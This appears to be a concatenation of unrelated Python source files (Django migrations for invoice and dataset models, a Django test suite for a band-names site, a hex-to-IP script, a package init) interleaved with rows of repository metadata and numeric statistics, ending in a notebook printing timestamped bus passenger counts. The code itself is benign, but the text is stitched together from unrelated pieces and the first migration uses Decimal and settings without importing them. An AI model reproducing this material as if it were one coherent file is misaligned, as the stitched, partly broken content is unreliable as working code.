from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20210528_0647'),
]
operations = [
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('description', models.TextField(blank=True)),
('payment_date', models.DateField()),
('payment_method', models.CharField(blank=True, max_length=255)),
('payment_note', models.TextField(blank=True)),
('gst_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('gst_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('net', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('total_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('grand_total', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.company')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.customer')),
('salesperson', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SalesOrder',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('description', models.TextField(blank=True)),
('payment_date', models.DateField()),
('payment_method', models.CharField(blank=True, max_length=255)),
('payment_note', models.TextField(blank=True)),
('gst_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_rate', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('gst_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('discount_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('net', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('total_amount', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('grand_total', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=10)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.company')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.customer')),
('invoice', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.invoice')),
('salesperson', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| 60.151515
| 149
| 0.61864
| 437
| 3,970
| 5.453089
| 0.189931
| 0.105749
| 0.146874
| 0.182123
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0.862778
| 0
| 0.030402
| 0.229471
| 3,970
| 65
| 150
| 61.076923
| 0.748611
| 0.011335
| 0
| 0.745763
| 1
| 0
| 0.115473
| 0.005863
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.067797
| 0
| 0.118644
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7e48bcdc2792b73955fd755c598e21eebc7c8baf
| 155
|
py
|
Python
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 14
|
2015-01-14T15:53:22.000Z
|
2019-06-21T06:15:47.000Z
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 1
|
2018-04-01T08:40:17.000Z
|
2020-06-24T10:05:33.000Z
|
other/hex2ip.py
|
mmmonk/crap
|
96ba81723f043503e7ed2f96ea727b524d22b83f
|
[
"MIT"
] | 12
|
2015-05-13T10:52:04.000Z
|
2020-10-07T14:49:37.000Z
|
#!/usr/bin/env python
import sys
ha = sys.argv[1]
print str(int(ha[0:2],16))+"."+str(int(ha[2:4],16))+"."+str(int(ha[4:6],16))+"."+str(int(ha[6:8],16))
| 19.375
| 101
| 0.56129
| 35
| 155
| 2.485714
| 0.514286
| 0.275862
| 0.367816
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118881
| 0.077419
| 155
| 7
| 102
| 22.142857
| 0.48951
| 0.129032
| 0
| 0
| 0
| 0
| 0.022388
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7e795c79ca209c2d16344444538c2d2656ad664d
| 71
|
py
|
Python
|
ipython/useful_functions.py
|
chenwang/QuantEcon.lectures.code
|
8832a74acd219a71cb0a99dc63c5e976598ac999
|
[
"BSD-3-Clause"
] | 56
|
2017-05-09T10:45:23.000Z
|
2022-01-20T20:33:27.000Z
|
ipython/useful_functions.py
|
chenwang/QuantEcon.lectures.code
|
8832a74acd219a71cb0a99dc63c5e976598ac999
|
[
"BSD-3-Clause"
] | 7
|
2017-06-30T01:52:46.000Z
|
2019-05-01T20:09:47.000Z
|
ipython/useful_functions.py
|
QuantEcon/QuantEcon.lectures.code
|
d61ac7bc54529dd5c77470c17539eb2418b047c9
|
[
"BSD-3-Clause"
] | 117
|
2017-04-25T16:09:17.000Z
|
2022-03-23T02:30:29.000Z
|
def meaning_of_life():
"Computes the meaning of life"
return 42
| 23.666667
| 34
| 0.704225
| 11
| 71
| 4.363636
| 0.727273
| 0.375
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036364
| 0.225352
| 71
| 3
| 35
| 23.666667
| 0.836364
| 0.394366
| 0
| 0
| 0
| 0
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7ea95212b1dbeb19ed7cd27df4fd07c8f8bc774c
| 13,473
|
py
|
Python
|
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
bandnames/bandnames/names/tests.py
|
pyepye/bandnames
|
6c1af25e427ddc9d5bcbdca017d39813c34030bd
|
[
"MIT"
] | null | null | null |
import urllib2
# from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test import Client
from django.test import TestCase
from bandnames.names.models import Bands, NewBand, ReportBand
class BandNamesBasePagesTest(TestCase):
def test_home(self):
response = self.client.get(reverse('band_list'))
self.assertTrue(response.status_code == 200)
def test_about(self):
response = self.client.get(reverse('about'))
self.assertTrue(response.status_code == 200)
class BandNamesTest(TestCase):
def setUp(self):
self.band1 = Bands.objects.create(
name='Some Band Name',
reason='First band reason',
source='test',
scrapped_from='test',
)
self.band2 = Bands.objects.create(
name='Another Band Name',
reason='Second band reason',
source='test',
scrapped_from='test',
)
self.client = Client()
def test_band_list(self):
response = self.client.get(reverse('band_list'))
self.assertTrue(response.status_code == 200)
for band in response.context['bands']:
self.assertIn(band, [self.band1, self.band2])
self.assertTrue(response.content.count(self.band1.name) == 1)
self.assertTrue(response.content.count(self.band2.name) == 1)
def test_band_list_search(self):
search_url = '{0}?search={1}'.format(reverse('band_list'), self.band1.name) # NOQA
response = self.client.get(search_url)
self.assertTrue(response.status_code == 200)
self.assertTrue(len(response.context['bands']) == 1)
self.assertTrue(response.context['bands'][0] == self.band1)
# Once in the search box, once in 'results for' and once in the list
self.assertTrue(response.content.count(self.band1.name) == 2)
def test_band_details(self):
response = self.client.get(
reverse('band_info', args=(self.band1.name,))
)
self.assertTrue(response.status_code == 200)
self.assertTrue(self.band1 == response.context['band'])
self.assertTrue(response.content.count(self.band1.reason) == 1)
class BandNamesReportTest(TestCase):
def setUp(self):
self.band1 = Bands.objects.create(
name='Some Band Name',
reason='First band reason',
source='test',
scrapped_from='test',
)
self.band2 = Bands.objects.create(
name='Another Band Name',
reason='Second band reason',
source='test',
scrapped_from='test',
)
self.client = Client()
def test_band_report_page(self):
report_url = reverse('band_report', args=(self.band1.name,))
response = self.client.get(report_url)
self.assertTrue(response.status_code == 200)
self.assertTrue(self.band1 == response.context['band'])
def test_band_report(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.reporter_email == email)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
self.assertTrue(report.reporter_name == name)
report.delete()
def test_band_report_no_email(self):
report_url = reverse('band_report', args=(self.band1.name,))
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
self.assertTrue(report.reporter_name == name)
report.delete()
def test_band_report_no_reporter_name(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
reason = 'This is a reason'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
report = ReportBand.objects.get(band=self.band1)
self.assertTrue(report.reporter_email == email)
self.assertTrue(report.source == source)
self.assertTrue(report.reason == reason)
report.delete()
def test_band_report_bad_email(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test'
source = 'http://example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reporter_email', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
def test_band_report_no_reason(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
source = 'http://example.com'
name = 'Test'
data = {
'reporter_email': [email],
'source': [source],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reason', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
def test_band_report_no_source(self):
report_url = reverse('band_report', args=(self.band1.name,))
email = 'test@example.com'
reason = 'This is a reason'
name = 'Test'
data = {
'reporter_email': [email],
'reason': [reason],
'reporter_name': [name]
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('source', response.context['form'].errors)
with self.assertRaises(ReportBand.DoesNotExist):
ReportBand.objects.get(band=self.band1)
class NewBandTest(TestCase):
def test_new_band_page(self):
report_url = reverse('new_band')
response = self.client.get(report_url)
self.assertTrue(response.status_code == 200)
def test_new_band(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_name == submitter_name)
self.assertTrue(band.submitter_email == submitter_email)
band.delete()
def test_new_band_no_email(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_name == submitter_name)
band.delete()
def test_new_band_no_name(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 302)
band = NewBand.objects.get(name=name)
self.assertTrue(band.name == name)
self.assertTrue(band.reason == reason)
self.assertTrue(band.source == source)
self.assertTrue(band.submitter_email == submitter_email)
band.delete()
def test_new_band_bad_email(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test'
data = {
'name': [name],
'reason': [reason],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('submitter_email', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
def test_new_band_no_reason(self):
report_url = reverse('new_band')
name = 'Test'
source = 'http://example.com'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'source': [source],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('reason', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
def test_new_band_no_source(self):
report_url = reverse('new_band')
name = 'Test'
reason = 'This is a reason'
submitter_name = 'Test'
submitter_email = 'test@example.com'
data = {
'name': [name],
'reason': [reason],
'submitter_name': [submitter_name],
'submitter_email': [submitter_email],
}
response = self.client.post(report_url, data=data)
self.assertTrue(response.status_code == 200)
report_url = urllib2.unquote(report_url)
self.assertTrue(report_url == response.request['PATH_INFO'])
self.assertIn('source', response.context['form'].errors)
with self.assertRaises(NewBand.DoesNotExist):
NewBand.objects.get(name=name)
# class BandNamesManagementCommandsTest(TestCase):
# def test_get_band_names(self):
# call_command('get_band_names', test=True)
# url = 'http://en.wikipedia.org/wiki/List_of_band_name_etymologies'
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://en.wikipedia.org/wiki/List_of_bands_named_after_other_bands%27_songs' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://rateyourmusic.com/list/DanFalco/why_are_they_called_duran_duran__a_guide_to_band_name_etymologies/1/' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
# url = 'http://www.rateyourmusic.com/list/EverythingEvil/bands_named_after_movies_/' # NOQA
# self.assertTrue(Bands.objects.filter(scrapped_from=url).count() > 0)
| 38.384615
| 133
| 0.608699
| 1,500
| 13,473
| 5.301333
| 0.082
| 0.105634
| 0.066398
| 0.066901
| 0.870599
| 0.868587
| 0.844567
| 0.831112
| 0.793888
| 0.787349
| 0
| 0.010881
| 0.263267
| 13,473
| 350
| 134
| 38.494286
| 0.790248
| 0.071699
| 0
| 0.79538
| 0
| 0
| 0.117704
| 0
| 0
| 0
| 0
| 0
| 0.227723
| 1
| 0.069307
| false
| 0
| 0.016502
| 0
| 0.09901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb10e58fbaea5667fc1c4e287db11f112aa0307
| 1,552
|
py
|
Python
|
data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 1
|
2021-04-08T05:22:35.000Z
|
2021-04-08T05:22:35.000Z
|
data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 8
|
2019-08-05T18:16:07.000Z
|
2019-10-29T18:42:53.000Z
|
data_facility_admin/migrations/0013_auto_20181120_0828.py
|
NYU-CI/dfadmin
|
071f38c62aea8ef8bf4ae82dbd672694e719b9bf
|
[
"CC0-1.0"
] | 2
|
2019-09-11T15:24:32.000Z
|
2020-01-08T20:34:05.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-11-20 13:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_facility_admin', '0012_auto_20181115_2045'),
]
operations = [
migrations.AddField(
model_name='dataset',
name='source_archive',
field=models.CharField(blank=True, help_text=b'Represents the source archive reference for this dataset in the that we got it from an archive instead of directly from the data owner/provider.', max_length=256, null=True),
),
migrations.AddField(
model_name='dataset',
name='source_url',
field=models.CharField(blank=True, help_text=b'Indicates the URL for the Source Archive, when this information is needed.', max_length=256, null=True),
),
migrations.AddField(
model_name='historicaldataset',
name='source_archive',
field=models.CharField(blank=True, help_text=b'Represents the source archive reference for this dataset in the that we got it from an archive instead of directly from the data owner/provider.', max_length=256, null=True),
),
migrations.AddField(
model_name='historicaldataset',
name='source_url',
field=models.CharField(blank=True, help_text=b'Indicates the URL for the Source Archive, when this information is needed.', max_length=256, null=True),
),
]
| 43.111111
| 233
| 0.666881
| 196
| 1,552
| 5.147959
| 0.367347
| 0.077304
| 0.091179
| 0.107037
| 0.800793
| 0.800793
| 0.800793
| 0.760159
| 0.760159
| 0.760159
| 0
| 0.037257
| 0.239046
| 1,552
| 35
| 234
| 44.342857
| 0.817104
| 0.042526
| 0
| 0.714286
| 1
| 0.071429
| 0.387053
| 0.015509
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e34b19ef42260550a0a33c389e7dcddd97576c8
| 189
|
py
|
Python
|
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | null | null | null |
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | null | null | null |
didipack/__init__.py
|
AntoineDidisheim/didipack
|
9c9266bf248cae79e6ffddd98b7e573108abaa57
|
[
"MIT"
] | 1
|
2021-02-08T09:26:04.000Z
|
2021-02-08T09:26:04.000Z
|
from didipack.latex_table import *
from didipack.parameters import ParamsBasis
from didipack.latex_ressource import *
from didipack.latex_paper import *
from didipack.plot_function import *
| 37.8
| 43
| 0.851852
| 25
| 189
| 6.28
| 0.44
| 0.382166
| 0.324841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100529
| 189
| 5
| 44
| 37.8
| 0.923529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e5f41e8882e187a291d295d418d630b51cb595f
| 615,523
|
py
|
Python
|
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
hubus-dati/analisi dati.py
|
Liukooo/Hubus
|
344cc2b42343ebf12a1817ad97c5b77c0813b31a
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 06:46:14', '0']\n",
"['2018-11-22 06:52:11', '0']\n",
"['2018-11-22 06:52:27', '1']\n",
"['2018-11-22 06:53:01', '2']\n",
"['2018-11-22 06:53:50', '2']\n",
"['2018-11-22 06:54:42', '2']\n",
"['2018-11-22 06:54:53', '2']\n",
"['2018-11-22 06:55:17', '3']\n",
"['2018-11-22 06:56:21', '3']\n",
"['2018-11-22 06:57:57', '3']\n",
"['2018-11-22 06:58:11', '3']\n",
"['2018-11-22 06:58:42', '4']\n",
"['2018-11-22 06:59:38', '4']\n",
"['2018-11-22 06:59:46', '5']\n",
"['2018-11-22 07:00:58', '5']\n",
"['2018-11-22 07:01:51', '5']\n",
"['2018-11-22 07:03:35', '7']\n",
"['2018-11-22 07:05:37', '9']\n",
"['2018-11-22 07:06:31', '10']\n",
"['2018-11-22 07:07:18', '14']\n",
"['2018-11-22 07:07:59', '15']\n",
"['2018-11-22 07:08:56', '17']\n",
"['2018-11-22 07:09:53', '17']\n",
"['2018-11-22 07:10:19', '18']\n",
"['2018-11-22 07:11:18', '19']\n",
"['2018-11-22 07:12:54', '19']\n",
"['2018-11-22 07:13:32', '19']\n",
"['2018-11-22 07:14:10', '20']\n",
"['2018-11-22 07:15:47', '20']\n",
"['2018-11-22 07:16:18', '20']\n",
"['2018-11-22 07:16:45', '21']\n",
"['2018-11-22 07:17:30', '21']\n",
"['2018-11-22 07:18:59', '21']\n",
"['2018-11-22 07:19:20', '21']\n",
"['2018-11-22 07:20:44', '21']\n",
"['2018-11-22 07:21:25', '21']\n",
"['2018-11-22 07:22:26', '21']\n",
"['2018-11-22 07:23:05', '21']\n",
"['2018-11-22 07:26:14', '8']\n",
"['2018-11-22 07:27:21', '0']\n",
"['2018-11-22 07:29:22', '2']\n",
"['2018-11-22 07:31:24', '4']\n",
"['2018-11-22 07:33:25', '5']\n",
"['2018-11-22 07:35:27', '5']\n",
"['2018-11-22 07:37:29', '5']\n",
"['2018-11-22 07:39:30', '5']\n",
"['2018-11-22 07:41:32', '5']\n",
"['2018-11-22 07:43:34', '7']\n",
"['2018-11-22 07:45:35', '8']\n",
"['2018-11-22 07:47:37', '9']\n",
"['2018-11-22 07:49:39', '11']\n",
"['2018-11-22 07:51:40', '13']\n",
"['2018-11-22 07:53:42', '16']\n",
"['2018-11-22 07:55:44', '15']\n",
"['2018-11-22 07:57:45', '14']\n",
"['2018-11-22 07:59:47', '14']\n",
"['2018-11-22 08:01:49', '15']\n",
"['2018-11-22 08:03:50', '16']\n",
"['2018-11-22 08:05:52', '17']\n",
"['2018-11-22 08:07:54', '16']\n",
"['2018-11-22 08:09:55', '14']\n",
"['2018-11-22 08:11:57', '14']\n",
"['2018-11-22 08:13:59', '14']\n",
"['2018-11-22 08:16:00', '12']\n",
"['2018-11-22 08:18:02', '8']\n",
"['2018-11-22 08:20:04', '11']\n",
"['2018-11-22 08:22:05', '11']\n",
"['2018-11-22 08:24:07', '11']\n",
"['2018-11-22 08:26:09', '11']\n",
"['2018-11-22 08:28:10', '11']\n",
"['2018-11-22 08:30:12', '11']\n",
"['2018-11-22 08:32:14', '13']\n",
"['2018-11-22 08:34:15', '13']\n",
"['2018-11-22 08:36:17', '10']\n",
"['2018-11-22 08:38:19', '7']\n",
"['2018-11-22 08:40:20', '7']\n",
"['2018-11-22 08:42:22', '7']\n",
"['2018-11-22 08:44:24', '1']\n",
"['2018-11-22 08:46:25', '1']\n",
"['2018-11-22 08:48:27', '0']\n",
"['2018-11-22 08:50:29', '0']\n",
"['2018-11-22 08:52:30', '0']\n",
"['2018-11-22 08:54:32', '0']\n",
"['2018-11-22 08:56:34', '9']\n",
"['2018-11-22 08:57:07', '13']\n",
"['2018-11-22 08:58:14', '15']\n",
"['2018-11-22 08:58:26', '15']\n",
"['2018-11-22 08:59:12', '16']\n",
"['2018-11-22 09:00:25', '23']\n",
"['2018-11-22 09:01:08', '23']\n",
"['2018-11-22 09:01:35', '26']\n",
"['2018-11-22 09:03:52', '26']\n",
"['2018-11-22 09:06:03', '30']\n",
"['2018-11-22 09:06:47', '30']\n",
"['2018-11-22 09:07:29', '40']\n",
"['2018-11-22 09:08:16', '42']\n",
"['2018-11-22 09:09:02', '42']\n",
"['2018-11-22 09:10:45', '42']\n",
"['2018-11-22 09:11:32', '41']\n",
"['2018-11-22 09:14:54', '44']\n",
"['2018-11-22 09:17:06', '45']\n",
"['2018-11-22 09:18:48', '38']\n",
"['2018-11-22 09:20:40', '37']\n",
"['2018-11-22 09:22:07', '32']\n",
"['2018-11-22 09:23:59', '32']\n",
"['2018-11-22 09:25:34', '32']\n",
"['2018-11-22 09:26:39', '28']\n",
"['2018-11-22 09:28:21', '26']\n",
"['2018-11-22 09:31:33', '26']\n",
"['2018-11-22 09:36:44', '25']\n",
"['2018-11-22 09:44:14', '25']\n",
"['2018-11-22 09:45:55', '25']\n",
"['2018-11-22 09:46:46', '25']\n",
"['2018-11-22 09:47:16', '25']\n",
"['2018-11-22 09:47:38', '25']\n",
"['2018-11-22 09:48:19', '21']\n",
"['2018-11-22 09:49:11', '21']\n",
"['2018-11-22 09:50:31', '14']\n",
"['2018-11-22 09:51:36', '14']\n",
"['2018-11-22 09:52:32', '14']\n",
"['2018-11-22 09:53:09', '14']\n",
"['2018-11-22 09:54:49', '14']\n",
"['2018-11-22 09:55:50', '13']\n",
"['2018-11-22 09:56:39', '13']\n",
"['2018-11-22 09:57:14', '12']\n",
"['2018-11-22 10:02:12', '4']\n",
"['2018-11-22 10:03:16', '0']\n",
"['2018-11-22 10:04:28', '6']\n",
"['2018-11-22 10:05:41', '9']\n",
"['2018-11-22 10:06:54', '10']\n",
"['2018-11-22 10:08:07', '10']\n",
"['2018-11-22 10:09:20', '10']\n",
"['2018-11-22 10:10:33', '11']\n",
"['2018-11-22 10:11:46', '12']\n",
"['2018-11-22 10:12:59', '16']\n",
"['2018-11-22 10:14:12', '15']\n",
"['2018-11-22 10:15:25', '15']\n",
"['2018-11-22 10:16:38', '15']\n",
"['2018-11-22 10:17:51', '14']\n",
"['2018-11-22 10:19:04', '12']\n",
"['2018-11-22 10:20:17', '13']\n",
"['2018-11-22 10:21:30', '13']\n",
"['2018-11-22 10:22:43', '12']\n",
"['2018-11-22 10:23:56', '12']\n",
"['2018-11-22 10:25:09', '12']\n",
"['2018-11-22 10:26:22', '9']\n",
"['2018-11-22 10:27:35', '7']\n",
"['2018-11-22 10:28:48', '7']\n",
"['2018-11-22 10:30:01', '7']\n",
"['2018-11-22 10:31:14', '6']\n",
"['2018-11-22 10:32:27', '7']\n",
"['2018-11-22 10:33:40', '7']\n",
"['2018-11-22 10:34:53', '8']\n",
"['2018-11-22 10:36:06', '8']\n",
"['2018-11-22 10:37:19', '7']\n",
"['2018-11-22 10:38:32', '6']\n",
"['2018-11-22 10:39:45', '5']\n",
"['2018-11-22 10:40:58', '4']\n",
"['2018-11-22 10:42:11', '4']\n",
"['2018-11-22 10:43:24', '4']\n",
"['2018-11-22 10:44:37', '4']\n",
"['2018-11-22 10:45:50', '1']\n",
"['2018-11-22 10:47:03', '1']\n",
"['2018-11-22 10:48:16', '1']\n",
"['2018-11-22 10:49:29', '0']\n",
"['2018-11-22 10:50:42', '0']\n",
"['2018-11-22 10:51:55', '0']\n",
"['2018-11-22 10:53:08', '0']\n",
"['2018-11-22 10:54:21', '0']\n",
"['2018-11-22 10:55:34', '0']\n",
"['2018-11-22 10:56:47', '5']\n",
"['2018-11-22 10:57:31', '5']\n",
"['2018-11-22 10:57:54', '5']\n",
"['2018-11-22 10:58:39', '5']\n",
"['2018-11-22 10:59:16', '5']\n",
"['2018-11-22 11:00:04', '6']\n",
"['2018-11-22 11:00:39', '8']\n",
"['2018-11-22 11:01:36', '7']\n",
"['2018-11-22 11:02:57', '8']\n",
"['2018-11-22 11:05:09', '8']\n",
"['2018-11-22 11:05:23', '8']\n",
